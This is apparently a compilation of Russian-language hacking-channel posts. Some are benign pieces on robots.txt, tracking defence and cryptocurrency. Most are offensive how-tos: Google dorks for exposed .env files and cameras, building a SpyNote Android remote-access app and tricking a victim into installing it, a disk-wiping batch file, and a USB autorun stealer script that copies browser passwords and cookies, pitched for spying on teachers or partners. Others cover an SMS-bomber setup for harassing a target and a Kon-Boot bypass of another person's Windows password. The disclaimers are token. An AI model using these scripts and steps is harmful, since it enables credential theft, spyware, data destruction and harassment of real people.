C помощью следующей конфигурации любое сканирование на вашем сайте будет запрещено, что крайне важно при использовании сайта частного доступа.



User-agent: *




Disallow: /

Кроме того, вы можете заблокировать определенные каталоги, в которых будет исключена возможность сканирования. Чтобы защитить область / admin от злоумышленников введите этот код внутри:



User-agent: *




Disallow: /admin/

Также это обезопасит все внутренние подкаталоги.

Для ограничения доступа к определенным файлам введите:



User-agent: *




Disallow: /privatearea/file.htm

Ограничить доступ к динамическим URL, которые содержат символ "?"



User-agent: *




Disallow: /*?

Чтобы ограничить доступ к определенным расширениям файлов, используйте:



User-agent: *




Disallow: /*.php$/

При таком раскладе доступ ко всем файлам .php будет запрещен.

Вывод
Google - один из самых популярных поисковиков в мире, который, как все знают, может найти практически все. Однако, мы выясняли, что Google может быть использован как хакерский инструмент, если вы не будете на шаг впереди злоумышленников. Крайне важно уметь использовать его для поиска уязвимостей на вашем сайте, чтобы это потом не обернулось против вас. Зная и применяя вышеописанные способы, Google Dork может стать полезным и практичным помощником для вас.

https://i.gyazo.com/d07833aff43df6377a7b68733ff0fe93.jpg

Вступить в наш чат

В сегодняшней статье мы продолжаем разбирать методы взлома Google, также известные как Google Dorks. Ранее мы узнали, как с помощью дорков получить данные о логинах и паролях, искать FTP-серверы и веб-сайты, а также закрытые ключи SSH.


Читать первую часть

https://i.gyazo.com/8c7f9d8fc80c5aa0e76ec1de47bdccc1.jpg

Электронная почта

Списки email часто создаются для того, чтобы организовать людей в одну группу. Эти списки находятся в общем доступе, которые мы сейчас и будем искать.

Найти списки email с помощью Google Dorks довольно легко. В следующем примере мы собираемся получить файлы Excel, которые могут содержать много адресов электронной почты.


filetype:xls inurl:"email.xls"

https://i.gyazo.com/fa2f7d16e58f1181791675952b62e6a6.jpg

Однако стоит отметить тот факт, что некоторые люди специально оставляют в дырке вредоносное ПО. Скачав таблицу с адресами электронной почты, можно легко словить вирус.

Вы заметите, что незашифрованные имена пользователей, пароли и IP-адреса напрямую отображаются в результатах поиска. Вам даже не нужно нажимать на ссылки, чтобы получить данные для входа в базу данных.

ENV файлы

Файл .env позволяет настраивать отдельные переменные вашей среды и используется популярными средами веб-разработки.

Эти файлы (*.env) необходимо перемещать в недоступное для общего круга лиц место. Тем не менее, используя следующий дорк, вы поймете, что многие разработчики не позаботились об этом, поэтому файлы .env находятся в Google.


ext:env intext:APP_ENV= | intext:APP_D***G= | intext:APP_KEY=

Открытые камеры

Можете ли вы себе представить, что вашу личную жизнь в онлайн режиме могут смотреть абсолютно незнакомые пользователи в интернете?

Следующие методы взлома Google могут быть использованы для получения веб-страниц камер в реальном времени, которые не ограничили IP.

Вот dork, чтобы получить различные IP-камеры:


inurl:top.htm inurl:currenttime

https://i.gyazo.com/cbf9a7c13fee4966643a2ff51ba141bf.jpg

Чтобы найти трансляции на основе WebcamXP:


intitle:"webcamXP 5"

https://i.gyazo.com/2654453b47f51d64c63581c3ce5da137.jpg



И еще один дорк для обычных живых камер:


inurl:"lvappl.htm"

https://i.gyazo.com/4f0c475292580a412930fe897266d379.jpg

https://i.gyazo.com/32f43c9fcd2f7a4cf347d1c2894c1f97.jpg

В интернете есть множество онлайн-камер, с помощью которых вы можете вживую смотреть любую часть мира. В доступе без IP-ограничений находятся не только обычные камеры, то и даже военные и правительственные. При большом желании вы даже можете получить доступ к этим камерам, используя белый хакинг. Вы не только сможете дистанционно управлять всей панелью администратора, но и перенастроить ее по желанию.

Заключение

Google Dork - это Cвятой Грааль среди всех поисковых запросов Google. Они позволяют любому человеку получить доступ к нужной информации при условии, что вы умеете ее находить. Зная о возможностях дорков, вы можете использовать их во благо, будь-то защита своих данных или же поиск определенной информации.


Читайте здесь, как предотвратить Google Dork.

ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЮ

https://i.gyazo.com/b4f6aae70d584d928b95313b199d66d1.jpg

Вступить в наш чат

Ежедневно каждый человек сталкивается с рекламой в компьютере или телефоне, при чем большая часть увиденного наверняка вызывает интерес. А теперь вспомните, искали ли вы недавно какой-либо продукт из рекламы? Или может быть вы говорили про него с кем-то? Первый вопрос, который сейчас должно быть одолевает вас: "Как это работает?".

Ответ - Cross-device tracking.


Cross-Device Tracking - еще одна малоизвестная технология для отслеживания. Из названия можно сделать вывод о том, что принцип работы заключается в отслеживании пользователей параллельно с нескольких устройств. Этого можно добиться благодаря использованию высокочастотных звуков, которые не могут быть услышаны человеческим ухом. Проще говоря, Cross-Device Tracking может быть сравним со звуковым маячком для слежения.

https://i.gyazo.com/f58b2ca5b462f0f7712e91256a961e62.jpg

Для чего и кому это нужно

В первую очередь наибольший интерес Cross-Device Tracking представляет для маркетинговых компаний, которые всегда в поиске новых способов внедрения персонализированной рекламы. Ведь прибыль компании напрямую взаимосвязана с удовлетворением интересов потребителя. Хотя сами потребители не в восторге от идеи, что каждый их шаг фиксируется, и блокируют рекламу на своих устройствах, компании придумывают все новые способы для слежки, агрессивнее прежних.

Однако не только маркетологи оценили Cross-Device Tracking: данный метод отслеживания показался очень эффективным для деанона киберпреступников,которые даже используютTor, VPN и proxy.

Принцип работы Cross-Device Tracking

Чтобы понять как себя защитить, вы должны быть знакомы с принципом его работы. Эта технология работает не только с одним вашим устройством, а одновременно со всеми,такимикак компьютеры, телефоны, телевизоры и т.д. Таким образом создается комбинированный профиль для каждого пользователя, деанонимизирующий его.

https://i.gyazo.com/95bfb528e249f762cfc5d146d8b8f6d8.jpg

В качестве примера рассмотрим ситуацию:

Вы используете надежное соединение на компьютере VPN + Tor + proxy, занимаетесь своими делами в интернете, как вдруг раздается какой-то звук на сайте. В это время ваш телефон слышит тот же самый сигнал и вот, что происходит дальше. Допустим, разработчик голосового помощника на вашем телефоне или любое приложение, у которого есть доступ к микрофону, сотрудничает со спецслужбами. Информация, полученная с устройства, ваш IP-адрес и координаты будут незамедлительно переданы в систему для дальнейшего анализа. Конечно, на вашем компьютере есть полный анонизирующий пакет, но ваш телефон не был защищен таким же образом. Но это вы зря, надо было учесть все.

Заключение

Как нам всем известно, вычислить человека по одному лишь IP-адресу совсем не легко, чего не скажешь про технологию сross-device tracking. С помощью телефона или любого другого утройства вы можете преподнести все данные о себе на блюдечке - и номер телефона, и контакты, и координаты а также историю разговоров/СМС, и многое другое - этого хватит с лихвой, чтобы установить личность.

Можно ли защитить себя от сross-device tracking? И ответ положительный. О способах остановить слежку мы расскажем в следующей части.

https://i.gyazo.com/d094ec6225aedf075f13b0f811e39d75.jpg


Вступить в наш чат


Раннее мы рассказали про относительно новый метод слежки, объяснили принцип его работы, а также затронули его опасностьдля пользователей Tor, VPN, proxy.

Читать первую часть

Коротко напомним, что cross-device tracking - это технология отслеживания пользователей с помощью нескольких устройств.

Возможно, вас не беспокоит факт того, что за вами следят, и вам вообще по барабану, кто там и что собирает о вас. Но если все-таки вы не согласны быть героем "Шоу Трумана", то самое время помешать этому.

https://i.gyazo.com/aae8b505090f199cef551b6eebbf17e0.jpg

Как остановить cross-device tracking

Не стоит думать, что вы не в силах противостоять слежению. Вовсе нет. Вы можете предотвратить это с помощью следующих мер.

Отключите микрофон

Первое и самое необходимое, что нужно сделать - это отключить динамики или в настройках, или оборвав провода. Последнее необязательно, если вы, конечно, не Эдвард Сноуден. Для простых смертных больше подойдет первый способ, то есть ограничить доступ к микрофону. Но тут появляется проблема – нет возможности полноценно пользоваться устройством, особенно это касается телефона. Покуда есть приложения, которые блокируют микрофон в целом, то могут возникнуть проблемы с удобством использования. Например, каждый раз при звонке нужно будет включать микрофон.

Но тут уже сами решайте, что для вас важнее - анонимность или удобство.

Используйте VPN

Еще один отличный способ уберечь себя от отслеживания - использовать VPN. Почему? VPN - это инструмент, который скрывает ваш реальный IP-адрес и местоположение. Как правило, все веб-сайты и приложения, которые вы посещаете, определяют ваше местоположение. При использовании VPN оно будет для них недоступно.


Важно: используйте VPN на всех своих девайсах, не только на компьютере.

Скачайте анонимный браузер

Думаете, что режим инкогнито безопасен? Вы глубоко ошибаетесь. Если вы действительно хотите защитить себя от слежки, то разумнее будет использовать анонимный браузер, такой как Brave, Tor, DuckDuckGo. В отличие от Google и Яндекс, эти браузеры не отслеживают вас и не сохраняют ваши личные данные для дальнейшего обмена с третьими лицами.

Измените разрешения приложения

Зачем Google Chrome доступ к вашему микрофону и местоположению? Если у приложений в вашем телефоне есть полный доступ к тому, что не требуется для использования, то самое время отклонить эти разрешения.

Радикальный метод

И напоследок самый эффективный способ избежать слежки, который маловероятно вам понравится - вовсе отказать от смартфона. Купите обыкновенный кнопочный телефон или же специальный, ориентированный на безопасность. Они имеют очень ограниченный функционал и список установленных приложений. Это же касается и планшета.

Заключение

В современном мире конфиденциальность уже не такая, как была несколько лет назад. Крупные компании, правоохранительные органы используют различные инструменты и методы для отслеживания ваших действий в Интернете. Такое вторжение в личное пространство мало кому придется по душе. Но к счастью, пока что еще есть возможность оградить себя от этого.

https://i.gyazo.com/f73665bd28902959c5637e1a2e2cc8fa.jpg

Вступить в наш чат

В прошлой части мы уже затрагивали тему взлома Android пользователей. В этот раз речь пойдет про другой, более продвинутый вариант хакинга, который работает через интернет.

Если вы пропустили предыдущую часть, то советуем начать именно с нее.


Читать "Как хакнуть любой Android смартфон"

https://i.gyazo.com/3eb8f31b99d29a2172aad6b890afd1d8.jpg



Что потребуется?

Требования те же самые, как и для предыдущего способа, за исключением двух моментов.

Java;

Spynote;

Роутер с функцией проброса портов или переадресации портов. Это необходимо именно для взлома через интернет;

Динамический IP-адрес.


Итак, начнем.

Перейдите на noip.com и зарегистрируйтесь.

https://i.gyazo.com/e24d560416f989544390d5d6a0c79b3d.jpg

Далее кликните "Add Host", вводите любое имя и сохраните.

https://i.gyazo.com/68f0839bd848abd3751551b562bd6685.jpg

Загрузите DUC (Dynamic DNS Update Client) с официального сайта или нажмите здесь. Установите DUC и войдите в свою учетную запись. Как только вы это сделаете, IP-адрес вашей системы будет автоматически обновлен в DNS. Если этого не произошло, вы можете настроить DNS вручную.

https://i.gyazo.com/bbced98632d6b5b7704c4f44fdef7126.jpg

Нажмите "Add Host" в DUC, как показано на скрине. Если все сделано правильно, то высветятся все три зеленые галочки.

https://i.gyazo.com/904451ae954d39f2fc204e3222595aa4.jpg

Далее нам нужен IP-адрес шлюза для проброса портов из настроек нашего роутера. Поэтому введите "ipconfig" в командной строке, и вы получите IP-адрес шлюза.

https://i.gyazo.com/d01ab222c17bdd589a4d6be45a174a9d.jpg

Откройте любой браузер и вставьте туда IP шлюза. Откроется страница входа в систему. Введите имя пользователя и пароль вашего роутера (по умолчанию для большинства роутеров оба имени - admin).

Теперь перейдите к опции проброса портов. В зависимости от модели роутера, информация на скриншоте может отличаться, но принцип работы будет один и тот же.

https://i.gyazo.com/da2cbbee95f7247dae34bc5f2ef2c466.jpg

Нажмите "Добавить порт" -> "Добавить порт 2222" и сохраните его. Вы можете указать любой номер порта, какой пожелаете.

Cледующим шагом откройте файл spynote.exe, и он запросит у вас номер порта. Введите 2222 в качестве номера порта. И нажмите сохранить. Настройки роутера будут обновлены.

Добавьте все необходимые данные: имя клиента, название приложения, служба и версия. Вам нужно установить такое же имя хоста, как то, которое вы задали в клиенте NOIP в настройках DNS.

Как только вы закончите с этим, кликните на кнопку "Build".

https://i.gyazo.com/bd46ab598a55b847505b799bc157cb78.jpg

Теперь apk будет создан в папке spynote C:\Building-6.1\apktool\out.

https://i.gyazo.com/5bd32aed42175620b454374d06b59918.jpg

Готово. Остается только подключить творческий подход, чтобы заставить жертву установить apk на свое устройство.

Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.

https://i.gyazo.com/44dc59d55f4d3434aaeab0e9e09f6081.jpg

Вступить в наш чат


Cооснователь Ethereum Виталик Бутерин недавно рассказал о своём новом проекте – Soulbound Tokens (SBT) или токены, связанные душами.

Cегодня мы разберёмся в этом явлении. Вы узнаете в чем суть этих токенов, для чего они нужны и когда появятся.

https://i.gyazo.com/0d46c19996641367288f7f7825edb257.jpg

Что такое SBT

Аббревиатура SBT расшифровывается как Soulbound Tokens, что в переводе означает «Связанные душой токены». Пошло такое название из игры World of Warcraft, словом «Soulbound» назывался отдельный класс предметов, которые можно было получить за внутриигровые достижения, например, за победу над противником.

В отличие от игры, в реальной жизни Soulbound действуют как показатели ваших достижений, только вместо профиля игрока, они будут привязываться к крипто-кошельку пользователя. SBT точно так же, как ваше резюме, представляют ваши навыки, опыт работы, образование и квалификацию. На основе всего этого, можно получить представление о ваших способностях.

Отличие NFT от SBT

Основное отличие от NFT заключается в том, SBT не подлежат передаче и, следовательно, не могут быть приобретены посредством торговли. Каждый SBT навсегда привязывается к кошельку.

Сферы применения

Искусство. SBT значительно облегчат жизнь NFT-художникам, так как никто не сможет присвоить себе авторские права на чужую работу. Также для того, чтобы разрекламировать свой NFT, художнику приходится заводить аккаунт в Twitter, Instagram и на многих других площадках. Однако, если у художника будет свой Soulbound Token, то соцсети и биржи станут попросту не нужны.

Маркетинг. Кроме искусства можно представить использование SBT в любых сферах, где требуется проверка подлинности, например, рынок аренды или покупки недвижимости, где многое значит репутация продавца и достоверность данных, которые он предоставляет о своем объекте.

Образование. Когда NFT только начали набирать популярность, шли разговоры о том, что учебные заведения через N-количество лет будут выдавать дипломы в виде NFT, но здесь возникла несостыковка: если NFT можно продать другому человеку, то, соответственно, то же самое можно проделать и с дипломом. Но тут в дело вступают Soulbound Tokens – с ними купить образование или другого рода достижения не получится. Прямая проверка подлинности даст возможность избежать ряд проблем, так как использование технологий блокчейна поможет определить авторство, время, дату получения и другую информацию.
https://i.gyazo.com/f7cb459f1ac1292553598e611c66429d.jpg

Как могут присваиваться SBT

Самостоятельно. Вы можете заполнить и подтвердить информацию о себе, содержащую данные об образовании, стаже работы, творчестве.

Пользователями. Такие SBT могут быть получены и подтверждены участниками, с которыми вы взаимодействовали — например, за помощь другому пользователю.

Организаторами событий. Это будет своего рода сертификат, подтверждающий участие. Например, за участие в конференции, за прохождение обучения и т.д.
Таким образом, у крипто-кошелька пользователя начнет формироваться своя история и репутация. Можно будет наблюдать, где он обучался, в каких мероприятиях участвовал, кому помогал и где работал.

Когда появятся SBT?

По оценке Виталика Бутерина, первые SBT появятся к концу 2022 года. А к 2024 году они уже станут трендом. Выпускать их смогут как обычные пользователи, так и организации, включая DAO.

Заключение

Soulbound tokens презентовали себя как передовую технологию, позволяющую развить цифровое портфолио, сформировать и укрепить репутацию и сделать пользовательские отношения более прозрачными и надёжными. Хотя нам еще предстоит узнать, как именно SBT повлияют на цифровое пространство, но мы уже точно можем сделать вывод о том, что они изменят мир криптовалюты.

https://i.gyazo.com/e7b424c324366a316e84961f9303d10f.jpg

Вступить в наш чат


Задумывались ли вы когда-нибудь как создаются вирусы на ПК? Вы будете удивлены, узнав, что для этого вам не нужны никакие знания о языках программирования. Все, что вам потребуется - это блокнот и пара, написанных строк, о которых мы расскажем в этой статье. Это очень просто. Давайте начнем!

https://i.gyazo.com/aea5a62e53041d5945d809155e678aa4.jpg

Что такое .bat

Для начала разберём немного теории, которая нам впоследствии понадобится. Не все знают, что в блокноте можно написать простые вирусы в формате .bat. Что это за файл такой?

.bat — текстовый файл в MS-DOS, OS/2 или Windows, содержащий последовательность команд после запуска которых, программа-интерпретатор начинает их исполнять.

Как создать файл .bat:
Открыть блокнот или иной текстовый редактор;

Ввести нужные команды;

Сохранить файл с расширением .bat (Например: virus.bat)
Итак, приступим к созданию вируса с помощью блокнота.

Опасный вирус

Дисклеймер


Вся информация, приведённая ниже, представлена лишь в ознакомительных целях. Не пытайтесь повторить это, так как это может полностью уничтожить компьютер за считанные секунды.


Для начала вам нужно открыть блокнот.

Далее скопируйте и вставьте приведенный ниже код на экран блокнота.
Echo (https://forum.antichat.xyz/members/812226/) offDel C: *.* |y
Сохраните этот файл под любым именем, но обязательно в формате .bat.

При запуске этого файла, операционная система и диск С будут уничтожены без возможности восстановления.
Этот метод предназначен только для ознакомительных целей. Не пытайтесь сделать это на своем компьютере, так как это полностью отформатирует ваш диск C.

Вирусы-розыгрыши

1. Создаем экран как в «Матрице»

Данный вирус абсолютно безопасен, потому что на самом деле это больше трюк с блокнотом, не имеющий отношения к реестру компьютера. Используя этот способ, вы можете запустить матричный экран со случайной последовательностью цифр.
Откройте блокнот и введите в него следующий код:
Echo (https://forum.antichat.xyz/members/812226/) offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
Теперь сохраните файл как под названием Matrix.bat;

Откройте файл и почувствуйте себя “избранным”.
Данный трюк может быть использован в качестве розыгрыша друзей.

2. Отключаем доступ к Интернету

Это еще один неопасный способ, который вы также можете продемонстрировать друзьям.
Откройте блокнот;

Скопируйте и вставьте, ниже указанный код:
Echo (https://forum.antichat.xyz/members/812226/) off Ipconfig / release
Сохраните файл под любым именем, но обязательно в формате.bat;

Как только файл будет открыт, IP-адрес потеряется;

Чтобы вернуть все, как было, введите в cmd команду «Обновить» или «IPconfig», и проблема будет решена.

https://i.gyazo.com/5e19694f1ae3e5ddb16d37c51e764535.jpg

Вступить в наш чат



В этой статье мы расскажем о том, как легко можно украсть учётные записи и пароли браузера с помощью флешки. А так же поговорим, как защитить себя от подобных атак.

https://i.gyazo.com/2c4a4f42c9fe7b25f1143b2b0fefd3ee.png



Cookie-файлы – зашифрованные текстовые документы, содержащие информацию о пользователе: статистику, персональные настройки, сохранённые логины и пароли, а также многое другое.
Что это может дать?
Вариантов применения очень много, все лишь зависит от вашей изобретательности. Если вы студент или школьник, то с помощью этого способа вы можете украсть данные препода, тем самым первым узнать о предстоящих контрольных и проверочных работах. Вы также можете проверить вторую половинку или наказать недоброжелателя.
Итак, переходим к пошаговой инструкции:

Создаём cookie-стиллер

1.В первую очередь вам, конечно же, потребуется любая флэшка, где мы создадим следующие текстовые файлы:


autorun.inf

и


stealer.bat

Не забудьте изменить расширения этих файлов с txt на inf и bat.

2. В файле autorun.infвводим:


Open="stealer.bat"

А в файле stealer.batпишем:


@echo off





md %~d0\Mozilla





md %~d0\0pera





md %~d0\Google





md %~d0\Yandex





md %~d0\Amigo





CD/D %APPDATA%\Opera\Opera\





cls





copy /y wand.dat %~d0\Opera\





copy /y cookies.dat %~d0\Opera\





cd %AppData%\Mozilla\Firefox\Profiles\*.default





copy /y cookies.sqlite %~d0\Mozilla





copy /y key3.db %~d0\Mozilla





copy /y signons.sqlite %~d0\Mozilla





copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla





cd %localappdata%\Google\Chrome\User Data\Default





cls





copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"





cd %localappdata%\Yandex\YandexBrowser\User Data\Default





copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"





cd %localappdata%\Amigo\User Data\Default





copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"





cls





ATTRIB -R -A -S -H





attrib +h %~d0\Mozilla





attrib +h %~d0\Opera





attrib +h %~d0\Google





attrib +h %~d0\Yandex





attrib +h %~d0\Amigo





attrib +h %~d0\search.bat





attrib +h %~d0\new





attrib +h %~d0\autorun.inf





del: autorun.inf?


Стиллер готов. Сохраняем и закрываем.

Но что же делать после того, как вы украли куки? Все просто.
3.Нажимаем Windows+R и вводим:


%appdata%

4. Свои куки на СВОЁМ компьютере удаляем, либо временно скидываем на флешку. А на их место копируем полученные.

5. Теперь скачиваем программу WebBrowserPassView. Здесь уже ничего не надо нажимать - программа сама загрузит и расшифрует куки из ваших браузеров. Просто открываем ее и видим сайты с учётными записями и паролями к ним.

Как защитить себя от cookie-стиллера

Никогда не храните пароли в браузере! Уж лучше в тетрадке под кроватью. Хранить пароли в браузере очень опасно. Но что же делать?
Если вы не можете положиться на свою память, то у вас есть два варианта для хранения:


Бумага. Самый традиционный и безопасный способ, если при этом хранить в недоступном месте.

Софт для хранения паролей. Если вы до сих пор записываете пароли в текстовом документе/блокноте на ПК, то знайте, что это ни чем не лучше браузера. Вместо этого используйте специальное программное обеспечение для хранения паролей. Например, софт KeePassX, который распространяется бесплатно на базе лицензии GPL и имеет открытый исходный код.
Вся вышеизложенная информация предоставлена в ознакомительных целях. Мы не призываем к действию.

https://i.gyazo.com/abcd1402bff36856152b60f65ad992df.jpg

Вступить в наш чат



В сегодняшней статье мы расскажем как перегрузить телефон жертвы спамом. Данный способ является очень действенным и даже может вывести телефон из строя на время.


Дисклеймер: Вся информация, опубликованная в этой статье, предоставлена лишь в ознакомительных целях. Мы ни к чему не призываем и не несём ответственности за ваши действия.

https://i.gyazo.com/b81768236e723396b001630408dd8a92.jpg

СМС-бомбер - это ПО для массовой рассылки сообщений на заданный номер телефона. СМС-атака зачастую используется как способ отвлечения внимания жертвы при осуществлении взлома социальных сетей, кражи денег с кредитки или просто как метод психологического давления.

1-й способ - на компьютере

В первую очередь вам необходимо скачать и установить две программы:


Python;

Git:
Как только завершится установка, откройте Git и нажмите правой кнопкой мыши по рабочему столу, выбрав "Git Bash Here".

https://i.gyazo.com/67601cbad522babf17eef4e10d397cc7.jpg

Следующим действием прописываем команды:


git clone https://github.com/crinny/b0mb3r
Далее заходим в папку с бомбером:


cd b0mb3r
Теперь устанавливаем библиотеку:


pip install -r requirements.txt
И запускаем:


python main.py
В браузере откроется вкладка с бомбером, где вам нужно будет заполнить поле:

https://i.gyazo.com/2d468733e1d4fd4bc7d12bb6f16efb80.jpg

2-й способ - на телефоне

Вы также можете выполнить установку смс бомбера на телефоне.

Для этого скачиваем Termux.

После установки пишем эти команды:


pkg update && pkg upgrade (обновляем пакеты)

pkg install python (устанавливаем Python)

pkg install git (устанавливаем Git)

git clone https://github.com/crinny/b0mb3r (клонируем репозиторий)

cd b0mb3r (переходим в директорию с бомбером)

pip install -r requirements.txt (устанавливаем библиотеку)

python main.py (запускаем)
Если браузер не открывается, тогда скопируйте следующую ссылку:

https://i.gyazo.com/477fc39ec4496933de9d52795ad2d801.jpg

И затем ее вставляем в адресную строку браузера:

https://i.gyazo.com/e3b52a9e7c99dfb286be83cb9bc2a985.jpg

Теперь у вас откроется та же самая вкладка, как в 1-ом способе. Заполните поле и атака начнётся.

https://i.gyazo.com/1f4cca3d31fc4a77d8c2a7e8dfe502f4.jpg

__________________

https://i.gyazo.com/2a908c9845981b5d661bb6a63cbbb8e4.jpg

Вступить в наш чат


Хотите узнать, как войти в компьютер другого человека, не зная при этом пароля? Да так, чтобы жертва еще не догадалась о ваших планах? Звучит интригующе? Тогда сядьте поудобнее и приготовьтесь к прочтению нашего простого мануала. И нет, вам не нужно быть профессиональным хакером или программистом, чтобы провернуть все это. Мы расскажем как просто проникнуть в ПК с помощью одной лишь программы - Kon-Boot.

https://i.gyazo.com/d3934d9194253232c91771be183c7012.jpg

Kon-Boot — программа, временно изменяющая содержимое ядра Windows. Она позволяет войти в учётную запись без пароля, не сбрасывая его. При повторном включении содержимое ядра восстанавливается, и снова запрашивается пароль, поэтому пользователь ПК ничего не заметит.

Для того, чтобы провернуть все это вам потребуется:

1. USB-накопитель;

2. Программа Kon-Boot. Скачать здесь.

Установка программы Kon-Boot на флешку

Вставляем флешку в USB разъём.

После того как вы распаковали программу, откройте папку Kon-Boot for Windows 2.5.0 и запустите файл KonBootInstaller от имени администратора.
https://i.gyazo.com/dc0dfefc53a6ebdaabaf929e2b113943.jpg

Далее появится окно с предостережением о том, что в ПК должна находится только одна флешка, иначе во время установки может быть выдана ошибка. Если готовы к установке, то подтвердите.

В разделе Available USB drivers из выпадающего списка выберите флешку и нажмите Install to USB stick (with EFI support).

https://i.gyazo.com/deb4bceffb7e68c18d332007a9b06565.jpg


Имейте ввиду, что вся информация, за исключением программы Kon-Boot, во время установки будет утеряна. Если на флешке ничего важного не осталось, то жмём «Да».
https://i.gyazo.com/8f25b68b1d283fd8da530fe2b950e8ed.jpg


Теперь запустится установка:
https://i.gyazo.com/b94df7867ce212d32872b5fe865cedde.jpg

Если вы столкнётесь с ошибкой:


Fatal: unable to copy C:\Kon-Boot for Windows 2.5.0\kon-bootUSB\USBFILES\menu.lst to G:\menu.lst, error = 0x00000002 (file exists=0)

То переименуйте файл konboot.lst в menu.lst, после чего заново запишите Kon-Boot на флешку через KonBootInstaller.exe,тогда ошибка будет устранена.

По завершению установки, нажмите «Оk».
https://i.gyazo.com/3c86881a5e09b18d26f3e6ac0c77ec90.jpg

Запуск флешки на ПК

Вставляем USB-накопитель с программой в разъём и запускаем ПК.

Далее вызываем Boot menu. На разных материнских платах клавиши вызова Boot menu отличаются, поэтому сверьтесь с таблицей ниже:
https://i.gyazo.com/67b148281f3306cfc2df28fb87d42d0e.jpg
Если же вы не знаете какая материнка стоит на компьютере, то обесточьте его и откройте боковую крышку системного блока, там вы найдёте модель.
https://i.gyazo.com/2b663658c08b01c3e35a5bcefae7521e.jpg


выбираем загрузку с флешки и кликаем «Enter».

В новом окне выберите Kon-Boot (CURRENT VERSION) и нажмите «Enter».

Далее на экране появится надпись Kon-Boot, после чего начнётся загрузка Windows.
https://i.gyazo.com/67a2ef80980ed31e4a146fece0ec252f.jpg


Если на экране появилась надпись «No Systemdisk. Booting from harddisk. Start booting from USB device…» — переустановите Kon-Boot используя KonBootInstaller.exe.




Если же на экране появилась надпись «Dummy bios detected trying to fix smap entries» — Вам необходимо в настройках BIOS выключить опцию Secure boot, а также включить опции Load Legacy Option Rom / CSM.


Когда ПК запросит пароль, оставьте поле пустым, либо введите случайные символы (Windows примет их как за правильный пароль) и нажмите «Enter».
Готово! Вы успешно обошли пароль. При повторном включении компьютера, все вернётся на свои места.

Вся информация в этой статье написана исключительно в ознакомительных целях.

https://i.gyazo.com/02ce4590e35ce060f41e761e0ac398f1.jpg

Вступить в наш чат


Ни для кого не секрет, что информация о транзакциях в блокчейне является общедоступной, а адрес криптокошелька легко соотнести с личностью пользователя, поэтому можно сделать вывод о том, что большинство криптовалют не анонимны. Но позитивным моментом является тот факт, что существует ряд криптовалют, ориентированных на приватность. Одной из таких является Ghost. В этой статье мы расскажем чем же отличается эта криптовалюта от любой другой и правда ли она полностью конфиденциальна.

https://i.gyazo.com/5781163301fb777308781b256ca84a04.jpg



На момент появления Биткоина в 2009 году считалось невозможным определить личность владельца криптобиржи. Однако, сейчас мы знаем о том, что любой человек может отслеживать путь перемещения биткоинов в блокчейне и сопоставлять адреса кошельков с конкретными личностями.

Но с тех пор прошло много времени и компании пересмотрели концепцию анонимной криптовалюты. Для наглядности давайте посмотрим на очевидные отличия GHOST от других не менее популярных криптовалют :

https://i.gyazo.com/44e8a230a212ee1feeb0a775cde9d5cd.png


Итак, протокол Dandelion, он же одуванчик, делит транзакции на две части:
«Стебель». Данные переходят от 1-го узла ко 2-му рандомное количество раз. Иначе говоря, передаются от одного человека к другому.

«Пух». Последний, у кого они оказались, рассылает их по всей сети. Так, как это бы происходило в обычном блокчейне.

Появляется элемент непредсказуемости, поэтому невозможно отследить изначальный источник отправления. Как видно из таблицы, похожий протокол применяется лишь в Monero.

Cold-Staking. Стейкинг — это блокировка своей криптовалюты для получения дальнейшей прибыли. Обычно для стейкинга нужно находится в онлайне и раскрывать адрес своего кошелька. Но в Ghost этот момент решается с помощью холодного стейкинга без подключения к интернету. Это помогает сделать процесс стейкинга более конфиденциальным.

Ghost Pay. Как и у всех анонимных криптовалют, Ещё одним отличием Ghost от других криптокошельков является возможность получать и отправлять криптовалюту прямо внутри Telegram бота @GhostPayBot.
Где покупать Ghost

Практически на всех криптобиржах есть обязательная верификация личности. Чтобы сохранить анонимность, необходимо покупать криптовалюту с осторожностью. Вот список конфиденциальных способов купить GHOST:

TradeOgre. Эта криптобиржа ориентируется на конфиденциальность и не разглашает информацию о своих клиентах третьим лицам. Если вы хотите зарегистрироваться на ней, вам понадобится электронная почта и аутентификатор — приложение, генерирующее код входа. GHOST торгуется в паре с BTС, а комиссия составляет 0,01 GHOSТ.

HotBit.Эта биржа является одной из крупнейших в мире по объёму торгов. Чтобы зарегистрировать, необходимо подтвердить телефон. GHOST торгуется с тремя другими криптовалютами: USDT, BTC и ETH. Комиссия за вывод составляет 11 GHOST.

GhostX. Это своего рода обменник без посредников. Чтобы начать им пользоваться нужно только подключить свой криптокошелек. Обменять GHOST можно на 26 доступных криптовалют. Комиссия зависит от уровня загрузки сети.
Хотя существуют и другие сервисы для покупки и обмена криптовалюты GHOST, но они собирают больше данных о вас, а значит менее конфиденциальны.

Вывод

Ghost — это анонимная криптовалюта, в основе которой лежат Patrticl, который в свою очередь произошел от Биткоина. В отличие от аналогов, в ней используются технологии Proof-of-Stake, RingCT и Dandelion++, а так же Ghost Pay, который работает с Telegram.

https://i.gyazo.com/24ddb5297623a1f8e71460aa1af735eb.jpg

Вступить в наш чат


Кто бы мог подумать, что такое устройство как Wi-Fi-роутер может стать серьёзной угрозой для вашей личной безопасности. Большинство людей пренебрегают защитой беспроводных маршрутизаторов, потому что недооценивают возможный вред, который может нанести злоумышленик, взломав ваше соединение. В этой статье вы узнаете чем это опасно и найдете простые способы защиты роутера.

https://i.gyazo.com/dc1581e1fdfa17ca1d63fc7b42629677.jpg

Что случится, если ваш роутер взломают?


Перехват паролей и других данных, которые вы передаёте по сети;

Заражение компьютера вредоносным ПО;

Слежка за вашей активностью в сети;

Блокировка Интернет-соединения;

Доступ к веб-камерам;

Использование вашего соединения для совершения преступной деятельности.
И многое другое…

Взлом роутера – это настоящая угроза для любого пользователя со серьёзными последствиями. Но не стоит впадать в панику, ведь «спасение утопающих – дело рук самих утопающих», и сейчас мы поделимся с вами способами защиты от подобных атак.

Как защитить роутер от хакеров

Измените учетные данные администратора роутера

